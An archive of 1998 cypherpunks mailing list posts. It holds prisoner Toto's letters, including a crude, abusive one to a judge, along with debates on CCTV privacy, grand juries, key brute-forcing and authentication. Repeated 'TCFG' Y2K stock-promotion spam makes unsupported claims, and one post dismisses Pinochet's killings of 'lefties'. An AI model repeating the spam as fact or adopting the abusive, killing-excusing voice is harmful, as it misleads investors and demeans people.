to reveal "How I Broke PGP (TM.")

Seriously, though (and I've got an
Ocean Front Jail Cell in Florence, AZ),
I expect that the GooberMint needs me
to be 'crazy' enough for my writing, facts
and opinions to be dismissed, yet 'sane'
enough to be criminally liable for my actions.

I am certain that the employees of "a
suitable facility for psychiatric examination
as designated by the Bureau of Prions" know
exactly what is expected of them.

BTW, the 'Dead Lucky AP-Bot' received just
three votes - for Rabid Wombat, Toto, and for
Donald Duck (If I remember correctly).

Three targets - three years in jail.
Sounds fair to me...

I *know* my proper role in this Dark
Comedy.

After a suitable period of 'Attitude Adjustment',
I'm supposed to accept whatever offer of
'leniency' the Feds feel generous enough
to offer me.

The problem, of course, is that not only
am I a spritual Channeler of the BIG FUCK YOU!,
but I am also cursed with an affliction,
Tourette Syndrome, which often causes me
to implusively blurt out...The TRUTH (TM).

The PROBLEM (TM) is that I am a CypherPunk,
and I would rather spend 3 years sitting naked
in a cold, hard prison cell, than to help
bring the world one step closer to where
there aren't any CypherPunks to piss all over
themselves and each other - and even on
self-righteous, high-minded government
officials, from time to time.

The REAL PROBLEM (TM) is that, ultimately,
I am still naive and/or hopeful enough to believe
that there still exist, [illegible ------------]
for an ordinary citizen to slip through the
cracks in a Statist/Robotic Judicial System
into a Time/Space Continuum where Jimmy Stewart
wouldn't be disbarred for being 'too [illegible].'

I have no doubt that the IRS/Government can,
as has been intimated, "put the hammer down"
on myself, my family and my friends if they
choose to do so.

My only response to this is that, if this is so and
if there is no true recourse available for the common
citizen, then the difference between living in an
Inside prison versus an Outside prison is
mostly Illusory anyway.

My poor Sainted Father, who would have
been justified in strangling me in my crib,
had he realized the grief I would cause him over
the years, wrote to me in prison expressing his
worry that perhaps my present situation was the
result of him having failed me in so many ways
over the course of the last few years.

I replied that my Father *was* responsible
for my current situation, as a result of being
the World's Most Wonderful Father (TM) and making
it possible for me to spend the last few years
doing exactly what I really and truly wanted
to do.

After my next court appearance, I may be
mentally & financially broken, slobbering and
drooling on myself, but I *will* be smiling...

The Bible taught me what to expect as
a result of telling The Truth (TM), and a
short story, "[???} By Niggel," taught me
what to expect as a result of being the Author...

But I'm the TruthMonger, so it's the only
dance there is...

(Bop Shoo Bop, Bopper-Bopper-Shoo-Bop).

ToTo
CYPHERPUNKS CULT OF ONE
"Close Ranks! Every WoMan for HimOrHer Self!"
ARMY OF DOG
"ANARCHY - Together We Can Make It Happen!"
CIRCLE OF EUNUCHS
"He Who Shits On The Road Will Meet Flies Upon His Return"

[End Letter 1]

----------

[Cover note Letter 2; no date]

Declan,

ToTo -> -> Funny Farm

Yours is only address handy

Please fwd -> LJ Dowling -> Judge Fiora
       -> CPUNX List

Thanx

Toto

----------------------------------------------------------

Letter 2 is four mostly illegible pages of what appears 
to be scatalogical humor addressed to the Arizona magistrate,
Nancy Fiora, beginning:

  Yo Nancy!

  Are you Just As Ignorant As Snot (TM),
  a Callous Cunt (TM) or a Konciously Konspiring
  Kocksucker (TM)?

  If you are Just As Ignorant As Snot (TM),
  that might explain why you actually went
  through the motions of giving an order for
  me to receive proper medical treatment
  not understanding that Order From A Skirt (TM)
  in Arizona apparently doesn't mean Jack Shit
  to prison officials.

  If this is the case, could you please arrange
  for a Male Judge to issue the same orders and
  see if that clears up the problem?

Then 4 pages of illegible text with a few bits readable 
on withheld medical treatment leading to the risk of 
ingrown toenails, Big Hairy Butt (TM), and Fresh 
>From The ClueServer (TM) advice, with this closing:

  (You'll have to figure this part out without the
  pictures to help this time - moving your
  lips while you read might help...)

  I write this under the influence of the
  Drugs given to me by the physicians in whose
  care you have placed me.

  Some Fucking Improvement (TM), eh?

  On our next date (in court), you might want to
  choose a wash & wear Robe, since I could be
  drooling & slobbering a lot.

  Loves and Kisses
  [???] Psychotic Killer To Be Named Later.

[End Letter 2]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: advisor@compuserve.com
Date: Wed, 28 Oct 1998 22:59:11 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199810281358.FAA13997@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



10/28/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif. USA

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for!


























 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Wed, 28 Oct 1998 22:30:17 +0800
To: John <needshelp@mindspring.net>
Subject: Re: lotus notes id file
Message-ID: <19981028132659.15316.rocketmail@send101.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Sorry guy, no gettingout of dodge on this one.  There are no
utilities, no programs, no way out.  The only way to do this is to
copy the "mail file" which will be in the c:\notes\data directory and
blow away the id and recreate it.  Then after this, copy the mail file
back into the data directory.  This will recreate your desktop view
with the original folders and messages that you had.  Otherwise,
you're screwed.




---John <needshelp@mindspring.net> wrote:
>
> Hello
> 	I'm using lotus notes and I have a big problem. I have a id file
with no
> password. How can I get a password for it or reset it. Is there some
type of
> utility or something someone knows of?I have been told that I'm out
of luck
> unless I have the original.
> 
> 
> John...
> 
> 
> 
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dave@bureau42.ml.org>
Date: Wed, 28 Oct 1998 18:38:55 +0800
To: cypherpunks@cyberpass.net
Subject: Yet Another letter from Toto
Message-ID: <Pine.LNX.3.96.981028060019.4790A-100000@bureau42.ml.org>
MIME-Version: 1.0
Content-Type: text/plain



This letter, pornmarked 23 October 1998 from Springfield Missouri, has
some good requests and the usual style of Toto-esque humor that we've
all grown accustomed to. I hope I got the drug names spelled right, or at
least as close to it as he did, because I know about some of these drugs
and it sounds serious.

(begin letter)

Dave,
I need some medical info, and Attila
has shared some excellent material in the
past with me, so I was hoping he might be
able to send me Information Sheets on a few
medications.
(e.g. # Uses/Side Effects/Precuations/Interactions/etc.)

I'd like info on Zoloft, Zestril, Lithium, & Deprecote (?sp) - orange-ish
liquid capsules - ... and Tegretol and Respiradahl (?sp)

Also, if he could find any InterNet material
on Dr. Ruth Braun's current Tourette/Rage work,
or similar info, I would appreciate him
sending it to me.

If I get much more Government `Help,' I'm
going to be Dead, soon...

(I think if you tell the shrinks here that you
feel suicidal they handcuff your hands
behind your back, stand you on the toilet,
and suspend you from the light fixture
by a rope around your neck - so that you
don't hurt yourself, eh?)

I'm trying to produce as much CypherSpam
as possible while in Prison, so that the
CypherPunks computers don't get Dusty & Moldy
from sitting around with nothing to do.

(I figure my best chance at being released
from Prison is if the Manufacturers of <Delete>
Keys petition the GovernMint in order to
restore falling sales.
"If it saves the life of a single innocent KillFile...")

I'm learning a Trade at #9...
Cuckoo Clock!

Later Dude,
Toto

(end letter)

...dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <monitor@millenium.com>
Date: Wed, 28 Oct 1998 22:51:24 +0800
To: <cypherpunks@cyberpass.net>
Subject: No Subject
Message-ID: <989.283923.242667 monitor@millenium.com>
MIME-Version: 1.0
Content-Type: text/plain



                                                         10/28/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts...

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for.....




 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon 'tex' Boone" <tex@isc.upenn.edu>
Date: Wed, 28 Oct 1998 20:24:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: MIB Subponeas
In-Reply-To: <3.0.3.32.19981026144314.038c6020@rboc.net>
Message-ID: <m3r9vs99w3.fsf@localhost.localdomain>
MIME-Version: 1.0
Content-Type: text/plain




Tim May <tcmay@got.net> writes:
>
> * What about lawyer expenses? I know the line about "If you cannot afford one,
>   one will be appointed for you," but I've never understood what test of
>   "afford" is being used. If called before a grand jury, will they pay for a
>   lawyer? (E.g., if I decide I can't "afford" to pay some shyster to interpret
>   their legalese into ordinary English.)  (I assume there is some nonsense
>   about indigence, but can they force someone to prove he has no money?  What
>   if he money, but he needs that $5000 for school tuition more than he needs
>   to give it to Johnny Cockroach for a day's worth of shystering?)

  Tim,

    It is my understanding, from my brother in law (who is a practicing attorney
    in Pennsylvania) and from my sister's participation in a case in Texas that
    one does not have the right to have legal counsel present at a Grand Jury
    session.

-- 
--------------------------------------------------
Jon 'tex' Boone            Senior Network Engineer
ISC Networking          University of Pennsylvania
tex@isc.upenn.edu                   (215) 898-2477




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Oct 1998 22:09:37 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199810281330.HAA12754@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
> Date: Wed, 28 Oct 1998 10:04:17 +0100
> Subject: Re: Right of privacy

> It is important to set clear guidlines and codes of practice for such
> technological innovations, well in advance of the digital revolution
> making new and unforseen opportunities to collate, analyze, recognise
> and store such visual images. 

How does one pass laws to regulate something that doesn't exist yet?

> The attitude to CCTV camera networks varies greatly in the European Union,
> from the position in Denmark where such cameras ar banned by law to the
> position in the UK, where you can find one of the most advanced CCTV network
> coverage in Europe and where the issue of regulation and control have been
> perhaps more developed then anywhere else.

Are there any discussions about this dichotomy and how it came to pass?
Something that asks the question of why they chose such widely seperate
approaches? I would personaly guess the British have gotten a little
paranoid they're set for pay-back-time since their empire's been crumbling
for 200 years. I'm much less familiar with Dannish history (post-WWII) and
how they developed this respect for Big Brother and its potential.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: concerned@aol.com
Date: Thu, 29 Oct 1998 01:22:11 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199810281640.IAA15426@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



10/28/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif. USA

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for.......

























 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Thu, 29 Oct 1998 00:38:08 +0800
To: bill.stewart@pobox.com
Subject: Re: UK police chase crooks on CCTV (fwd)
In-Reply-To: <199810211322.IAA03036@einstein.ssz.com>
Message-ID: <v04003a00b25ceff1ac28@[192.168.229.6]>
MIME-Version: 1.0
Content-Type: text/plain



>>We need a law or court ruling pretty quickly in the US that sets the
>>standard that a group of people have no more or less rights than an
>>individual. This will required LEA's to provide probable cause prior to any
>>actions against groups of people (such as this).
>
>Ain't gonna happen - are you kidding?  If there is a ruling like that,
>it'll be done in some way that restricts citizen rights rather than
>expanding them, or expands police powers rather than restricting them.
>It's already legal for cops to hang around street corners watching for
>suspicious activities or suspicious people, and all video recognition
>technology does is increase their effectiveness and speed at doing things
>they already are allowed to do.
>
>Unfortunately, I'm being increasingly forced to take the David Brin
>position of
>"Cameras are cheap, get used to it, just make sure we have more cameras
>pointing at the cops than they have pointing at us, and make sure
>the cameras the government has are citizen-accessible as well."

An alternative is a new religion, The First Cypherpunk Church, whose
members are admonished to wear identiy hiding (oops, I mean modesty
enhancing) garb, like arab women. Then we can all go around anonymously in
public. Of course, you'll stick out like a sore thumb and may look like a
fool unless enough parishoners join, but....

--Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Thu, 29 Oct 1998 01:41:22 +0800
To: cypherpunks@cyberpass.net
Subject: Speed records, and brute force state of the art.
Message-ID: <2FBF98FC7852CF11912A0000000000010D19AD2B@DINO>
MIME-Version: 1.0
Content-Type: text/plain



>From the New York Times...

WASHINGTON-The Energy Department will take delivery on Wednesday of what the
Government says is the world's fastest computer, capable of a peak
performance of 3.88 trillion calculations, or teraflops, a second. 

Just to simplify things, let's assume that 1 flop == 1 decryption. I know
that's not true, but it's very close, and it's certainly less than one order
of magnitude off.

So, with this assumption how long does it take to break various key sizes?

56 bits -- 2^56 / 3.88E12 = 5.2 hours
64 bits -- 2^64 / 3.88E12 = 55 days
80 bits -- 2^80 / 3.88E12 = 9873 years
128 bits -- 2^128 / 3.88E12 = 2.8E18 years.

And now you know.

Harv.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: watcher@freeyellow.com
Date: Thu, 29 Oct 1998 19:16:11 +0800
To: <cypherpunks@Algebra.COM>
Subject: No Subject
Message-ID: <989.283923.429657 watcher@freeyellow.com>
MIME-Version: 1.0
Content-Type: text/plain



                                                         10/28/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts...

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for.....




 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Lockhart <Harold.Lockhart@platinum.com>
Date: Thu, 29 Oct 1998 00:10:30 +0800
To: Steve Bellovin <vin@shore.net>
Subject: Re: log files (was: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and Sending the Wizards Back to Menlo Park )
In-Reply-To: <199810262226.RAA12688@postal.research.att.com>
Message-ID: <3.0.1.32.19981028093825.00a3f2d0@pop.bos.platinum.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:26 PM 10/26/98 -0500, Steve Bellovin wrote:

>Leaving aside the rest of this discussion, Vin touches on a point that
>I think has been ignored by some:  operations demand log files.  That
>is -- and I'm doffing my security hat here and donning the hat of someone
>who has been running computer systems and networks for 30+ years --
>when I'm trying to manage a system and/or troubleshoot a problem,
>I *want* log files, as many as I can get and cross-referenced 17 different
>ways.  This isn't a security issue -- most system administrator headaches are
>due to the "benign indifference of the universe", or maybe to Murphy's Law
>-- but simply a question of having enough information to trace the
>the perturbations caused to the system by any given stimulus.
>
>The more anonymity, and the more privacy cut-outs, the harder this is.

With respect to Steve's vast experience on this subject, I must disagree.
Managing and tracking systems and networks does require monitoring and
logging of traffic.  However, the information of interest is confined to
the headers.  There is no need to examine the body of user messages for
these purposes.  Even less would their be a need to "crack" some kind of
bearer token. (Of course this implies that crypto should be applied as far
up the stack as possible, ideally in the application. But that is another
debate.)

I hear you saying, "but what if the guy is trying to break into my system."
 I would argue, that if you are using strong cryptographic authentication
(whether his identity can be mapped to a human being or not) then either 1)
he will fail, in which case you don't care or 2) he will succeed, in which
case he must have used some technique like stealing a key which cannot be
detected by monitoring.

I raise this point, because I see it as part of a current trend to resist
stong security measures in preference to weak ones.  The current industry
facination with weak measures, like firewalls and intrusion detection
systems has caused some people to resist the introduction of strong
measures, such as cryptographic authentication and data protection.  The
most popular example of this is the foolish practice of putting an SSL
server, with its vital server private key, outside the firewall in a DMZ.  

But I have also heard system administrators protest the introduction of
cryptographic solutions because some current half measure will no longer
work.  There are even misguided individuals who have proposed putting
master decryption keys at vulnerable locations like border routers, so that
messages can be inspected in the fly.

Like many people here, I live in the practical world and read dbs for
serious amusement (see Darwin on Malthus).  However in both worlds I spend
a lot of time trying to distingush the sound from the foolish.

Regards,

Hal

====================================================================
Harold W. Lockhart Jr.               PLATINUM technology
Chief Technical Architect            8 New England Executive Park
Email: Harold.Lockhart@platinum.com  Burlington, MA 01803 USA
Voice: (781)273-6406                 Fax: (781)229-2969
====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Lockhart <Harold.Lockhart@platinum.com>
Date: Wed, 28 Oct 1998 23:52:57 +0800
To: Vin McLellan <rah@shipwright.com>
Subject: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and   Sending the Wizards Back to Menlo Park
In-Reply-To: <v04020a04b2561b978874@[139.167.130.246]>
Message-ID: <3.0.1.32.19981028095039.00a435fc@pop.bos.platinum.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:02 PM 10/26/98 -0400, Vin McLellan wrote:

>	For 30-odd years, info security professionals have used a model
>which declares that there are only three ways for a machine to validate or
>authenticate that a remote human is the person who was initially identified
>and enrolled (by a trusted Admin) as the user authorized to use a computer
>account:
>
>_"something known," a memorized password or PIN;
>_"something held," a physical token that can be carried as a personal
>identifier; or
>_"something one is," a biometric like a fingerprint or voiceprint.

However, formal security theory, dating back before the invention of PK has
recognized that authorization systems can be just as effectively based on a
Capability model as an Identity model.  A bearer token in my mind, is
nothing more than a kind of Capability.

The idea is that what you really want to know is "should this request be
permitted." Using identity to determine this is just a way of adding a
level of indirection to the algorithm.  In a capability model, the answer
is presented directly.

The debate over these models has always revolved around efficiency.  I will
not review that here, except to note that while capabilities usually take
their lumps for not being able to scale well, pure identity models do not
scale either.  It is always necessary to introduce some form of
aggregation, such as groups, roles, citizens, credit card holders,
whatever, that reduces the number of individual rules that must be managed,
stored and referenced.

Therefore, while you may reasonably argue that dbs will not work or scale
or whatever for one reason or another, you cannot argue that it is not
supported by formal security theory.

Regards,

Hal
====================================================================
Harold W. Lockhart Jr.               PLATINUM technology
Chief Technical Architect            8 New England Executive Park
Email: Harold.Lockhart@platinum.com  Burlington, MA 01803 USA
Voice: (781)273-6406                 Fax: (781)229-2969
====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
Date: Wed, 28 Oct 1998 17:31:09 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: Right of privacy
In-Reply-To: <199810280135.TAA10758@einstein.ssz.com>
Message-ID: <WIN937-981028080310-2BFA*/G=Theodor/S=SCHLICKMANN/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



> One thing I know is that the social potential for video cameras in relation
> to traffic management are immense. The problem is that their potential for
> abuse when coupled with other sorts of technologies is absolutely
> frightening. I don't believe that potential is enough to avoid them out of
> hand.
> 
> > It is not only communication.
> > Privacy is also needed on public places (e.g., violated by face 
> recognition systems), 
> > at work places (e.g.,violated by telephone tapping), for your body (e.g., 
> endangered by 
> > abortion control),
> 
> No, what is needed in public places is anonymity. We want to be treated 
> just
> like everyone else. We specificaly don't want any identity.


It is important to set clear guidlines and codes of practice for such
technological innovations, well in advance of the digital revolution
making new and unforseen opportunities to collate, analyze, recognise
and store such visual images. Such regulation will need to be founded 
on sound data protection principles and take cognizance of
article 15 of the European Data Protection Directive. Essentially it
says that:

"Member States shall grant the right of every person not to be subject
to a decision which produces legal effects concerning him or significantly
affects him and which is based solely on the automatic processing of
data".

The attitude to CCTV camera networks varies greatly in the European Union,
from the position in Denmark where such cameras ar banned by law to the
position in the UK, where you can find one of the most advanced CCTV network
coverage in Europe and where the issue of regulation and control have been
perhaps more developed then anywhere else.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Lockhart <Harold.Lockhart@platinum.com>
Date: Wed, 28 Oct 1998 23:39:48 +0800
To: Vin McLellan <rah@shipwright.com>
Subject: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and   Sending the Wizards Back to Menlo Park
In-Reply-To: <v04020a04b2561b978874@[139.167.130.246]>
Message-ID: <3.0.1.32.19981028100547.00a39c1c@pop.bos.platinum.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:02 PM 10/26/98 -0400, Vin McLellan wrote:

>	No one who knows anything about SDTI and that market would say that
>the only thing SDTI has that is worth anything is its stake in Verisign
>(and, of course, it was Rob, not the Globe, who said that.)

I've been waiting for somebody to mention that (according to
www.ncipher.com) one of the primary investors in Ncipher, which is the
company Bob touted in the rant that started this thread, is none other than
SDTI.

They also list investments by Newbridge and no less than three V.C.
companies.  Seems at odds with Bob's claim that they "used little, if any,
venture capital money".  However, I have not information about the history
or extent of investment in this company, so I bow to Bob's insider
knowledge. (Bob, I thought you were going to stop posting insider knowledge
to this list.  Or was it that you were going to stop NOT posting ...)

As an aside about Ncipher, while I am sure they are smart guys and will do
well, isn't a hardware crypto engine pretty much a commodity product?  How
can a company like this resist an onslaught from an IBM or an Intel if they
decided this niche was large enough to go after?

Regards,

Hal
====================================================================
Harold W. Lockhart Jr.               PLATINUM technology
Chief Technical Architect            8 New England Executive Park
Email: Harold.Lockhart@platinum.com  Burlington, MA 01803 USA
Voice: (781)273-6406                 Fax: (781)229-2969
====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 29 Oct 1998 03:03:10 +0800
To: cypherpunks@cyberpass.net
Subject: Re: MIB Subponeas
In-Reply-To: <3.0.3.32.19981026144314.038c6020@rboc.net>
Message-ID: <v0313030fb25d0e67bc14@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:57 AM -0800 10/28/98, Jon 'tex' Boone wrote:
>Tim May <tcmay@got.net> writes:
>>
>> * What about lawyer expenses? I know the line about "If you cannot
>>afford one,
>>   one will be appointed for you," but I've never understood what test of
>>   "afford" is being used. If called before a grand jury, will they pay for a
>>   lawyer? (E.g., if I decide I can't "afford" to pay some shyster to
>>interpret
>>   their legalese into ordinary English.)  (I assume there is some nonsense
>>   about indigence, but can they force someone to prove he has no money?
>>What
>>   if he money, but he needs that $5000 for school tuition more than he needs
>>   to give it to Johnny Cockroach for a day's worth of shystering?)
>
>  Tim,
>
>    It is my understanding, from my brother in law (who is a practicing
>attorney
>    in Pennsylvania) and from my sister's participation in a case in Texas
>that
>    one does not have the right to have legal counsel present at a Grand Jury
>    session.


Yes, yes, yes, I know this. (Had I not known it before, I would have after
the Monicagate matter.)

However, one is still at risk in grand jury matters, and attorneys are
usually used to advise. Also, one can leave the grand jury room to consult
with an attorney.

Too bad this is so, but nearly everyone who receives a subpoena hires an
attorney to advise on risks, consequences, etc. Anyone who gets sucked into
the Great Cypherpunks Conspiracy Trial probably ought to have competent
legal counsel.

(I received a subpoena from one of my neighbors, and it was written in
legalese that I had no way of understanding without a lawyer.  And I always
thought "Deuces take 'em" was a version of poker.)

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 29 Oct 1998 01:01:30 +0800
To: Hal Lockhart <vin@shore.net>
Subject: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and    Sending the Wizards Back to Menlo Park
In-Reply-To: <v04003a04b257b75fea2c@[198.115.179.81]>
Message-ID: <v04020a5bb25cee6677e9@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




As Cheech & Chong said once, "YYYYYYerrrrrrr Busteeeeed!". :-).


It seems I forgot that nCipher is, after all, a manufacturing company.

They needed capital to manufacture stuff with, and they went out and got
great gory piles of venture capital to do it with, several rounds, in fact,
in the millions of dollars.

While nCipher seems to be the exception which proves my "venture capitalism
is quaintly industrial" assertion, and that, Microsoft, C2NET, and most
first-mover software / net firms, can do just fine without venture capital
as long as they provide things their customers want, the best "venture
capital" to be found in their customers' pocket, and all that, I do plead
guilty yer honor, yet again, to working without a net.

Oh, well. On the internet, the cost of error is bandwidth, same as it ever
was. Sometimes "ready, fire, aim" means losing a toe or two...

Of course, it's easy to see how, like machinery eventually became to land
in agriculture, the most valuable component in manufacturing won't be the
machines themselves, but the software and wetware required to run those
machines, someday, but that's a rant of a different color, if not a whole
'nother generation.


Cheers,
Bob Hettinga


At 10:05 AM -0500 on 10/28/98, Hal Lockhart wrote:

> I've been waiting for somebody to mention that (according to
> www.ncipher.com) one of the primary investors in Ncipher, which is the
> company Bob touted in the rant that started this thread, is none other than
> SDTI.
>
> They also list investments by Newbridge and no less than three V.C.
> companies.  Seems at odds with Bob's claim that they "used little, if any,
> venture capital money".  However, I have not information about the history
> or extent of investment in this company, so I bow to Bob's insider
> knowledge. (Bob, I thought you were going to stop posting insider knowledge
> to this list.  Or was it that you were going to stop NOT posting ...)
>
> As an aside about Ncipher, while I am sure they are smart guys and will do
> well, isn't a hardware crypto engine pretty much a commodity product?  How
> can a company like this resist an onslaught from an IBM or an Intel if they
> decided this niche was large enough to go after?
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 29 Oct 1998 02:17:46 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: MIB Subponeas (fwd)
Message-ID: <199810281749.LAA14195@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 28 Oct 1998 18:33:59 +0100
> From: Anonymous <nobody@replay.com>
> Subject: Re: MIB Subponeas (fwd)

[various pieces of good advice in dealing with LEA's deleted]

It wasn't so much that they were IRS or whatever, it was they showed up in
the middle of my crit-sit patch regression and completely distracted my
attention from working on the patch for the customer. It was something
*else* to deal with in the priority 1 bin.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 29 Oct 1998 04:47:23 +0800
To: cypherpunks@cyberpass.net
Subject: RE: UK police chase crooks on CCTV (fwd)
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F850A@MSX11002>
Message-ID: <v03130310b25d28bef163@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:31 AM -0800 10/28/98, Duncan Frissell wrote:
>So when are they going to arrest Gorby and Fidel?  They killed more people.
>

Besides, most of the folks Pinochet disposed of were lefties and other
enemies of liberty.


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bellovin <smb@research.att.com>
Date: Thu, 29 Oct 1998 02:10:58 +0800
To: Hal Lockhart <Harold.Lockhart@platinum.com>
Subject: Re: log files (was: Re: dbts: Cryptographic Dog Stocks, The Dirigible Biplane, and Sending the Wizards Back to Menlo Park )
Message-ID: <199810281713.MAA29423@postal.research.att.com>
